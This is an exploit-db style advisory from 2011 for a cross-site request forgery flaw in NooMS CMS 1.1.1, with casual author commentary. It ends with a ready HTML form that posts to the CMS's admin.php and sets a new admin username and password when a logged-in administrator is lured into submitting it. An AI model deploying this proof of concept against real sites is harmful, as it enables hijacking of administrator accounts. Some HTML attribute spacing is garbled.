# NooMS CMS version 1.1.1 CSRF# Bug Found: April 9th 2011# Found by: loneferret (as far as I know anyway)# Software Download Link:
http://phpkode.com/download/p/2381_nooms_1.1.1.tar.bz2
# Nods to exploit-db Team# Well, I didn't have much to do this morning so figured I'd try to see how# fast it would take# me to find one of these. It's nothing to write home about. I mean...come# on! Who would use# a CMS named NooMS? This thing uses a MySQL database as well, wouldn't be# surprised if# there are other things to be found.# But I need to get some chores done before the wife starts.## Enjoy,# loneferret## p.s:# I wanted to contact the creator, but he's page (using NooMS) is# blank... nothing there so.. sorry.---HTML STARTS HERE---<form action='http://[host]/admin.php' method='post'><inputtype=hidden name='op' value='pref'><inputtype=hidden name='action' value='edit'>
Admin Username:<inputtype=text size=20 name='admin_user' value=''><br>
Admin Password:<inputtype=text size=20 name='admin_pwd' value=''><br>
Site Name:<inputtype=text size=40 name='site_name' value=''><br>
Site URL:<inputtype=text size=40 name='site_url' value=''><br>
Number of results per page:<inputtype=text size=10 name='search_numr' value=''><br>
Lang:<inputtype=text size=10 name='lang' value='en'><br>
Theme:<inputtype=text name=template value='default'><inputtype=submit value='change'></form>
